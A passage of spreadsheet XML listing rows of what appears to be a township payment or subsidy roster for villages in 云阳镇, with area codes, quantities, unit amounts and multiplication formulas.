      <c r="I1618" s="14">
        <f>H1618*G1618</f>
        <v>340</v>
      </c>
      <c r="J1618" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1618" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1619" ht="23" customHeight="1" spans="1:11">
      <c r="A1619" s="13" t="s">
        <v>4332</v>
      </c>
      <c r="B1619" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1619" s="14" t="s">
        <v>4333</v>
      </c>
      <c r="D1619" s="14" t="s">
        <v>3116</v>
      </c>
      <c r="E1619" s="14" t="s">
        <v>4334</v>
      </c>
      <c r="F1619" s="14" t="s">
        <v>4331</v>
      </c>
      <c r="G1619" s="14">
        <v>2</v>
      </c>
      <c r="H1619" s="14">
        <v>300</v>
      </c>
      <c r="I1619" s="14">
        <f>H1619*G1619</f>
        <v>600</v>
      </c>
      <c r="J1619" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1619" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1620" ht="23" customHeight="1" spans="1:11">
      <c r="A1620" s="13" t="s">
        <v>4335</v>
      </c>
      <c r="B1620" s="14" t="str">
        <f>B1619</f>
        <v>云阳镇</v>
      </c>
      <c r="C1620" s="14" t="str">
        <f>C1619</f>
        <v>狮子坟三里店</v>
      </c>
      <c r="D1620" s="13" t="s">
        <v>4336</v>
      </c>
      <c r="E1620" s="13" t="s">
        <v>4337</v>
      </c>
      <c r="F1620" s="14" t="str">
        <f>F1619</f>
        <v>4113210508</v>
      </c>
      <c r="G1620" s="14"/>
      <c r="H1620" s="14"/>
      <c r="I1620" s="14"/>
      <c r="J1620" s="14"/>
      <c r="K1620" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1621" ht="23" customHeight="1" spans="1:11">
      <c r="A1621" s="13" t="s">
        <v>4338</v>
      </c>
      <c r="B1621" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1621" s="14" t="s">
        <v>4339</v>
      </c>
      <c r="D1621" s="14" t="s">
        <v>4340</v>
      </c>
      <c r="E1621" s="14" t="s">
        <v>4341</v>
      </c>
      <c r="F1621" s="14" t="s">
        <v>4331</v>
      </c>
      <c r="G1621" s="14">
        <v>1</v>
      </c>
      <c r="H1621" s="14">
        <v>340</v>
      </c>
      <c r="I1621" s="14">
        <f>H1621*G1621</f>
        <v>340</v>
      </c>
      <c r="J1621" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1621" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1622" ht="23" customHeight="1" spans="1:11">
      <c r="A1622" s="13" t="s">
        <v>4342</v>
      </c>
      <c r="B1622" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1622" s="14" t="s">
        <v>4343</v>
      </c>
      <c r="D1622" s="14" t="s">
        <v>4344</v>
      </c>
      <c r="E1622" s="14" t="s">
        <v>4345</v>
      </c>
      <c r="F1622" s="14" t="s">
        <v>4346</v>
      </c>
      <c r="G1622" s="14">
        <v>2</v>
      </c>
      <c r="H1622" s="14">
        <v>300</v>
      </c>
      <c r="I1622" s="14">
        <f>H1622*G1622</f>
        <v>600</v>
      </c>
      <c r="J1622" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1622" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1623" ht="23" customHeight="1" spans="1:11">
      <c r="A1623" s="13" t="s">
        <v>4347</v>
      </c>
      <c r="B1623" s="14" t="str">
        <f>B1622</f>
        <v>云阳镇</v>
      </c>
      <c r="C1623" s="14" t="str">
        <f>C1622</f>
        <v>杨岗村</v>
      </c>
      <c r="D1623" s="18" t="s">
        <v>4348</v>
      </c>
      <c r="E1623" s="18" t="s">
        <v>4349</v>
      </c>
      <c r="F1623" s="14" t="str">
        <f>F1622</f>
        <v>4113210516</v>
      </c>
      <c r="G1623" s="14"/>
      <c r="H1623" s="14"/>
      <c r="I1623" s="14"/>
      <c r="J1623" s="14"/>
      <c r="K1623" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1624" ht="23" customHeight="1" spans="1:11">
      <c r="A1624" s="13" t="s">
        <v>4350</v>
      </c>
      <c r="B1624" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1624" s="14" t="s">
        <v>4351</v>
      </c>
      <c r="D1624" s="14" t="s">
        <v>4352</v>
      </c>
      <c r="E1624" s="14" t="s">
        <v>4353</v>
      </c>
      <c r="F1624" s="14" t="s">
        <v>4354</v>
      </c>
      <c r="G1624" s="14">
        <v>1</v>
      </c>
      <c r="H1624" s="14">
        <v>340</v>
      </c>
      <c r="I1624" s="14">
        <f t="shared" ref="I1624:I1633" si="84">H1624*G1624</f>
        <v>340</v>
      </c>
      <c r="J1624" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1624" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1625" ht="23" customHeight="1" spans="1:11">
      <c r="A1625" s="13" t="s">
        <v>4355</v>
      </c>
      <c r="B1625" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1625" s="14" t="s">
        <v>4351</v>
      </c>
      <c r="D1625" s="14" t="s">
        <v>4356</v>
      </c>
      <c r="E1625" s="14" t="s">
        <v>4357</v>
      </c>
      <c r="F1625" s="14" t="s">
        <v>4303</v>
      </c>
      <c r="G1625" s="14">
        <v>1</v>
      </c>
      <c r="H1625" s="14">
        <v>335</v>
      </c>
      <c r="I1625" s="14">
        <f t="shared" si="84"/>
        <v>335</v>
      </c>
      <c r="J1625" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1625" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1626" ht="23" customHeight="1" spans="1:11">
      <c r="A1626" s="13" t="s">
        <v>4358</v>
      </c>
      <c r="B1626" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1626" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1626" s="14" t="s">
        <v>4360</v>
      </c>
      <c r="E1626" s="14" t="s">
        <v>3766</v>
      </c>
      <c r="F1626" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1626" s="14">
        <v>1</v>
      </c>
      <c r="H1626" s="14">
        <v>340</v>
      </c>
      <c r="I1626" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1626" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1626" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1627" ht="23" customHeight="1" spans="1:11">
      <c r="A1627" s="13" t="s">
        <v>4361</v>
      </c>
      <c r="B1627" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1627" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1627" s="14" t="s">
        <v>4362</v>
      </c>
      <c r="E1627" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1627" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1627" s="14">
        <v>1</v>
      </c>
      <c r="H1627" s="14">
        <v>340</v>
      </c>
      <c r="I1627" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1627" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1627" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1628" ht="23" customHeight="1" spans="1:11">
      <c r="A1628" s="13" t="s">
        <v>4363</v>
      </c>
      <c r="B1628" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1628" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1628" s="14" t="s">
        <v>4364</v>
      </c>
      <c r="E1628" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1628" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1628" s="14">
        <v>1</v>
      </c>
      <c r="H1628" s="14">
        <v>340</v>
      </c>
      <c r="I1628" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1628" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1628" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1629" ht="23" customHeight="1" spans="1:11">
      <c r="A1629" s="13" t="s">
        <v>4365</v>
      </c>
      <c r="B1629" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1629" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1629" s="14" t="s">
        <v>4366</v>
      </c>
      <c r="E1629" s="14" t="s">
        <v>4367</v>
      </c>
      <c r="F1629" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1629" s="14">
        <v>1</v>
      </c>
      <c r="H1629" s="14">
        <v>340</v>
      </c>
      <c r="I1629" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1629" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1629" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1630" ht="23" customHeight="1" spans="1:11">
      <c r="A1630" s="13" t="s">
        <v>4368</v>
      </c>
      <c r="B1630" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1630" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1630" s="14" t="s">
        <v>4369</v>
      </c>
      <c r="E1630" s="14" t="s">
        <v>4370</v>
      </c>
      <c r="F1630" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1630" s="14">
        <v>1</v>
      </c>
      <c r="H1630" s="14">
        <v>340</v>
      </c>
      <c r="I1630" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1630" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1630" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1631" ht="23" customHeight="1" spans="1:11">
      <c r="A1631" s="13" t="s">
        <v>4371</v>
      </c>
      <c r="B1631" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1631" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1631" s="14" t="s">
        <v>4372</v>
      </c>
      <c r="E1631" s="14" t="s">
        <v>4373</v>
      </c>
      <c r="F1631" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1631" s="14">
        <v>1</v>
      </c>
      <c r="H1631" s="14">
        <v>340</v>
      </c>
      <c r="I1631" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1631" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1631" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1632" ht="23" customHeight="1" spans="1:11">
      <c r="A1632" s="13" t="s">
        <v>4374</v>
      </c>
      <c r="B1632" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1632" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1632" s="14" t="s">
        <v>4375</v>
      </c>
      <c r="E1632" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1632" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1632" s="14">
        <v>1</v>
      </c>
      <c r="H1632" s="14">
        <v>340</v>
      </c>
      <c r="I1632" s="14">
        <f t="shared" si="84"/>
        <v>340</v>
      </c>
      <c r="J1632" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1632" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1633" ht="23" customHeight="1" spans="1:11">
      <c r="A1633" s="13" t="s">
        <v>4376</v>
      </c>
      <c r="B1633" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1633" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1633" s="14" t="s">
        <v>4377</v>
      </c>
      <c r="E1633" s="14" t="s">
        <v>428</v>
      </c>
      <c r="F1633" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1633" s="14">
        <v>2</v>
      </c>
      <c r="H1633" s="14">
        <v>300</v>
      </c>
      <c r="I1633" s="14">
        <f t="shared" si="84"/>
        <v>600</v>
      </c>
      <c r="J1633" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1633" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1634" ht="23" customHeight="1" spans="1:11">
      <c r="A1634" s="13" t="s">
        <v>4378</v>
      </c>
      <c r="B1634" s="14" t="str">
        <f>B1633</f>
        <v>云阳镇</v>
      </c>
      <c r="C1634" s="14" t="str">
        <f>C1633</f>
        <v>南召店</v>
      </c>
      <c r="D1634" s="13" t="s">
        <v>4379</v>
      </c>
      <c r="E1634" s="13" t="s">
        <v>4380</v>
      </c>
      <c r="F1634" s="14" t="str">
        <f>F1633</f>
        <v>4113210519</v>
      </c>
      <c r="G1634" s="14"/>
      <c r="H1634" s="14"/>
      <c r="I1634" s="14"/>
      <c r="J1634" s="14"/>
      <c r="K1634" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1635" ht="23" customHeight="1" spans="1:11">
      <c r="A1635" s="13" t="s">
        <v>4381</v>
      </c>
      <c r="B1635" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1635" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1635" s="14" t="s">
        <v>4382</v>
      </c>
      <c r="E1635" s="14" t="s">
        <v>4383</v>
      </c>
      <c r="F1635" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1635" s="14">
        <v>1</v>
      </c>
      <c r="H1635" s="14">
        <v>340</v>
      </c>
      <c r="I1635" s="14">
        <f t="shared" ref="I1635:I1640" si="85">H1635*G1635</f>
        <v>340</v>
      </c>
      <c r="J1635" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1635" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1636" ht="23" customHeight="1" spans="1:11">
      <c r="A1636" s="13" t="s">
        <v>4384</v>
      </c>
      <c r="B1636" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1636" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1636" s="14" t="s">
        <v>4385</v>
      </c>
      <c r="E1636" s="14" t="s">
        <v>4386</v>
      </c>
      <c r="F1636" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1636" s="14">
        <v>1</v>
      </c>
      <c r="H1636" s="14">
        <v>340</v>
      </c>
      <c r="I1636" s="14">
        <f t="shared" si="85"/>
        <v>340</v>
      </c>
      <c r="J1636" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1636" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1637" ht="23" customHeight="1" spans="1:11">
      <c r="A1637" s="13" t="s">
        <v>4387</v>
      </c>
      <c r="B1637" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1637" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1637" s="14" t="s">
        <v>4388</v>
      </c>
      <c r="E1637" s="14" t="s">
        <v>3942</v>
      </c>
      <c r="F1637" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1637" s="14">
        <v>1</v>
      </c>
      <c r="H1637" s="14">
        <v>340</v>
      </c>
      <c r="I1637" s="14">
        <f t="shared" si="85"/>
        <v>340</v>
      </c>
      <c r="J1637" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1637" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1638" ht="23" customHeight="1" spans="1:11">
      <c r="A1638" s="13" t="s">
        <v>4389</v>
      </c>
      <c r="B1638" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1638" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1638" s="14" t="s">
        <v>4390</v>
      </c>
      <c r="E1638" s="14" t="s">
        <v>4391</v>
      </c>
      <c r="F1638" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1638" s="14">
        <v>1</v>
      </c>
      <c r="H1638" s="14">
        <v>340</v>
      </c>
      <c r="I1638" s="14">
        <f t="shared" si="85"/>
        <v>340</v>
      </c>
      <c r="J1638" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1638" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1639" ht="23" customHeight="1" spans="1:11">
      <c r="A1639" s="13" t="s">
        <v>4392</v>
      </c>
      <c r="B1639" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1639" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1639" s="14" t="s">
        <v>4393</v>
      </c>
      <c r="E1639" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1639" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1639" s="14">
        <v>1</v>
      </c>
      <c r="H1639" s="14">
        <v>340</v>
      </c>
      <c r="I1639" s="14">
        <f t="shared" si="85"/>
        <v>340</v>
      </c>
      <c r="J1639" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1639" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1640" ht="23" customHeight="1" spans="1:11">
      <c r="A1640" s="13" t="s">
        <v>4394</v>
      </c>
      <c r="B1640" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1640" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1640" s="14" t="s">
        <v>4395</v>
      </c>
      <c r="E1640" s="14" t="s">
        <v>3458</v>
      </c>
      <c r="F1640" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1640" s="14">
        <v>2</v>
      </c>
      <c r="H1640" s="14">
        <v>300</v>
      </c>
      <c r="I1640" s="14">
        <f t="shared" si="85"/>
        <v>600</v>
      </c>
      <c r="J1640" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1640" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1641" ht="23" customHeight="1" spans="1:11">
      <c r="A1641" s="13" t="s">
        <v>4396</v>
      </c>
      <c r="B1641" s="14" t="str">
        <f>B1640</f>
        <v>云阳镇</v>
      </c>
      <c r="C1641" s="14" t="str">
        <f>C1640</f>
        <v>南召店</v>
      </c>
      <c r="D1641" s="13" t="s">
        <v>4397</v>
      </c>
      <c r="E1641" s="13" t="s">
        <v>4398</v>
      </c>
      <c r="F1641" s="14" t="str">
        <f>F1640</f>
        <v>4113210519</v>
      </c>
      <c r="G1641" s="14"/>
      <c r="H1641" s="14"/>
      <c r="I1641" s="14"/>
      <c r="J1641" s="14"/>
      <c r="K1641" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1642" ht="23" customHeight="1" spans="1:11">
      <c r="A1642" s="13" t="s">
        <v>4399</v>
      </c>
      <c r="B1642" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1642" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1642" s="14" t="s">
        <v>3029</v>
      </c>
      <c r="E1642" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1642" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1642" s="14">
        <v>1</v>
      </c>
      <c r="H1642" s="14">
        <v>340</v>
      </c>
      <c r="I1642" s="14">
        <f>H1642*G1642</f>
        <v>340</v>
      </c>
      <c r="J1642" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1642" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1643" ht="23" customHeight="1" spans="1:11">
      <c r="A1643" s="13" t="s">
        <v>4400</v>
      </c>
      <c r="B1643" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1643" s="14" t="s">
        <v>4359</v>
      </c>
      <c r="D1643" s="14" t="s">
        <v>4401</v>
      </c>
      <c r="E1643" s="14" t="s">
        <v>3904</v>
      </c>
      <c r="F1643" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1643" s="14">
        <v>1</v>
      </c>
      <c r="H1643" s="14">
        <v>340</v>
      </c>
      <c r="I1643" s="14">
        <f>H1643*G1643</f>
        <v>340</v>
      </c>
      <c r="J1643" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1643" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1644" ht="23" customHeight="1" spans="1:11">
      <c r="A1644" s="13" t="s">
        <v>4402</v>
      </c>
      <c r="B1644" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1644" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1644" s="14" t="s">
        <v>4404</v>
      </c>
      <c r="E1644" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1644" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1644" s="14">
        <v>2</v>
      </c>
      <c r="H1644" s="14">
        <v>300</v>
      </c>
      <c r="I1644" s="14">
        <f>H1644*G1644</f>
        <v>600</v>
      </c>
      <c r="J1644" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1644" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1645" ht="23" customHeight="1" spans="1:11">
      <c r="A1645" s="13" t="s">
        <v>4405</v>
      </c>
      <c r="B1645" s="14" t="str">
        <f>B1644</f>
        <v>云阳镇</v>
      </c>
      <c r="C1645" s="14" t="str">
        <f>C1644</f>
        <v>小关社区</v>
      </c>
      <c r="D1645" s="14" t="s">
        <v>4406</v>
      </c>
      <c r="E1645" s="13" t="s">
        <v>3863</v>
      </c>
      <c r="F1645" s="14" t="str">
        <f>F1644</f>
        <v>4113210521</v>
      </c>
      <c r="G1645" s="14"/>
      <c r="H1645" s="14"/>
      <c r="I1645" s="14"/>
      <c r="J1645" s="14"/>
      <c r="K1645" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1646" ht="23" customHeight="1" spans="1:11">
      <c r="A1646" s="13" t="s">
        <v>4407</v>
      </c>
      <c r="B1646" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1646" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1646" s="14" t="s">
        <v>4408</v>
      </c>
      <c r="E1646" s="14" t="s">
        <v>4409</v>
      </c>
      <c r="F1646" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1646" s="14">
        <v>1</v>
      </c>
      <c r="H1646" s="14">
        <v>340</v>
      </c>
      <c r="I1646" s="14">
        <f t="shared" ref="I1646:I1651" si="86">H1646*G1646</f>
        <v>340</v>
      </c>
      <c r="J1646" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1646" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1647" ht="23" customHeight="1" spans="1:11">
      <c r="A1647" s="13" t="s">
        <v>4410</v>
      </c>
      <c r="B1647" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1647" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1647" s="14" t="s">
        <v>4411</v>
      </c>
      <c r="E1647" s="14" t="s">
        <v>3616</v>
      </c>
      <c r="F1647" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1647" s="14">
        <v>1</v>
      </c>
      <c r="H1647" s="14">
        <v>340</v>
      </c>
      <c r="I1647" s="14">
        <f t="shared" si="86"/>
        <v>340</v>
      </c>
      <c r="J1647" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1647" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1648" ht="23" customHeight="1" spans="1:11">
      <c r="A1648" s="13" t="s">
        <v>4412</v>
      </c>
      <c r="B1648" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1648" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1648" s="14" t="s">
        <v>4413</v>
      </c>
      <c r="E1648" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1648" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1648" s="14">
        <v>1</v>
      </c>
      <c r="H1648" s="14">
        <v>340</v>
      </c>
      <c r="I1648" s="14">
        <f t="shared" si="86"/>
        <v>340</v>
      </c>
      <c r="J1648" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1648" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1649" ht="23" customHeight="1" spans="1:11">
      <c r="A1649" s="13" t="s">
        <v>4414</v>
      </c>
      <c r="B1649" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1649" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1649" s="14" t="s">
        <v>4415</v>
      </c>
      <c r="E1649" s="14" t="s">
        <v>3794</v>
      </c>
      <c r="F1649" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1649" s="14">
        <v>1</v>
      </c>
      <c r="H1649" s="14">
        <v>340</v>
      </c>
      <c r="I1649" s="14">
        <f t="shared" si="86"/>
        <v>340</v>
      </c>
      <c r="J1649" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1649" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1650" ht="23" customHeight="1" spans="1:11">
      <c r="A1650" s="13" t="s">
        <v>4416</v>
      </c>
      <c r="B1650" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1650" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1650" s="14" t="s">
        <v>4417</v>
      </c>
      <c r="E1650" s="14" t="s">
        <v>3897</v>
      </c>
      <c r="F1650" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1650" s="14">
        <v>1</v>
      </c>
      <c r="H1650" s="14">
        <v>340</v>
      </c>
      <c r="I1650" s="14">
        <f t="shared" si="86"/>
        <v>340</v>
      </c>
      <c r="J1650" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1650" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1651" ht="23" customHeight="1" spans="1:11">
      <c r="A1651" s="13" t="s">
        <v>4418</v>
      </c>
      <c r="B1651" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1651" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1651" s="14" t="s">
        <v>4419</v>
      </c>
      <c r="E1651" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1651" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1651" s="14">
        <v>2</v>
      </c>
      <c r="H1651" s="14">
        <v>300</v>
      </c>
      <c r="I1651" s="14">
        <f t="shared" si="86"/>
        <v>600</v>
      </c>
      <c r="J1651" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1651" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1652" ht="23" customHeight="1" spans="1:11">
      <c r="A1652" s="13" t="s">
        <v>4420</v>
      </c>
      <c r="B1652" s="14" t="str">
        <f>B1651</f>
        <v>云阳镇</v>
      </c>
      <c r="C1652" s="14" t="str">
        <f>C1651</f>
        <v>小关社区</v>
      </c>
      <c r="D1652" s="14" t="s">
        <v>4421</v>
      </c>
      <c r="E1652" s="19" t="s">
        <v>4422</v>
      </c>
      <c r="F1652" s="14" t="str">
        <f>F1651</f>
        <v>4113210521</v>
      </c>
      <c r="G1652" s="14"/>
      <c r="H1652" s="14"/>
      <c r="I1652" s="14"/>
      <c r="J1652" s="14"/>
      <c r="K1652" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1653" ht="23" customHeight="1" spans="1:11">
      <c r="A1653" s="13" t="s">
        <v>4423</v>
      </c>
      <c r="B1653" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1653" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1653" s="14" t="s">
        <v>4424</v>
      </c>
      <c r="E1653" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1653" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1653" s="14">
        <v>1</v>
      </c>
      <c r="H1653" s="14">
        <v>340</v>
      </c>
      <c r="I1653" s="14">
        <f>H1653*G1653</f>
        <v>340</v>
      </c>
      <c r="J1653" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1653" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1654" ht="23" customHeight="1" spans="1:11">
      <c r="A1654" s="13" t="s">
        <v>4425</v>
      </c>
      <c r="B1654" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1654" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1654" s="14" t="s">
        <v>4426</v>
      </c>
      <c r="E1654" s="14" t="s">
        <v>4021</v>
      </c>
      <c r="F1654" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1654" s="14">
        <v>2</v>
      </c>
      <c r="H1654" s="14">
        <v>300</v>
      </c>
      <c r="I1654" s="14">
        <f>H1654*G1654</f>
        <v>600</v>
      </c>
      <c r="J1654" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1654" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1655" ht="23" customHeight="1" spans="1:11">
      <c r="A1655" s="13" t="s">
        <v>4427</v>
      </c>
      <c r="B1655" s="14" t="str">
        <f>B1654</f>
        <v>云阳镇</v>
      </c>
      <c r="C1655" s="14" t="str">
        <f>C1654</f>
        <v>小关社区</v>
      </c>
      <c r="D1655" s="43" t="s">
        <v>4428</v>
      </c>
      <c r="E1655" s="43" t="s">
        <v>4429</v>
      </c>
      <c r="F1655" s="14" t="str">
        <f>F1654</f>
        <v>4113210521</v>
      </c>
      <c r="G1655" s="14"/>
      <c r="H1655" s="14"/>
      <c r="I1655" s="14"/>
      <c r="J1655" s="14"/>
      <c r="K1655" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1656" ht="23" customHeight="1" spans="1:11">
      <c r="A1656" s="13" t="s">
        <v>4430</v>
      </c>
      <c r="B1656" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1656" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1656" s="14" t="s">
        <v>4431</v>
      </c>
      <c r="E1656" s="14" t="s">
        <v>4272</v>
      </c>
      <c r="F1656" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1656" s="14">
        <v>3</v>
      </c>
      <c r="H1656" s="14">
        <v>265</v>
      </c>
      <c r="I1656" s="14">
        <f>H1656*G1656</f>
        <v>795</v>
      </c>
      <c r="J1656" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1656" s="14" t="s">
        <v>225</v>
      </c>
    </row>
